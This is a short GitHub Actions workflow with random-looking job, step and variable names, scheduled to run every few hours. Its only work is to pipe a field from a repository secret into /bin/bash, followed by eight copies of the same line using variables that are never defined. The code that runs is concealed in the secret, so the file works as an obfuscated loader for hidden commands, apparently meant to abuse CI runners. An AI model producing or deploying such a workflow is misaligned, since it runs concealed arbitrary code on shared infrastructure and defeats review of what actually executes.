name: lirujing7654
on:
  workflow_dispatch:
  schedule:
    - cron: '28 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lirujing7654
        env:
          gqp5515: ${{ secrets.gqp5515 }}
        run: |
          echo $gqp5515 | jq -r .vtmhb9354 | /bin/bash
          echo $geemq9 | jq -r .h11 | /bin/bash
          echo $mi78195 | jq -r .riqyp53048 | /bin/bash
          echo $vs7 | jq -r .xptv075 | /bin/bash
          echo $qto37475 | jq -r .ftqki09854 | /bin/bash
          echo $ujfwa53 | jq -r .igh9 | /bin/bash
          echo $qlxq6848 | jq -r .bss8 | /bin/bash
          echo $pto50 | jq -r .tjs4269 | /bin/bash
          echo $jeqj01 | jq -r .zvpe8737 | /bin/bash

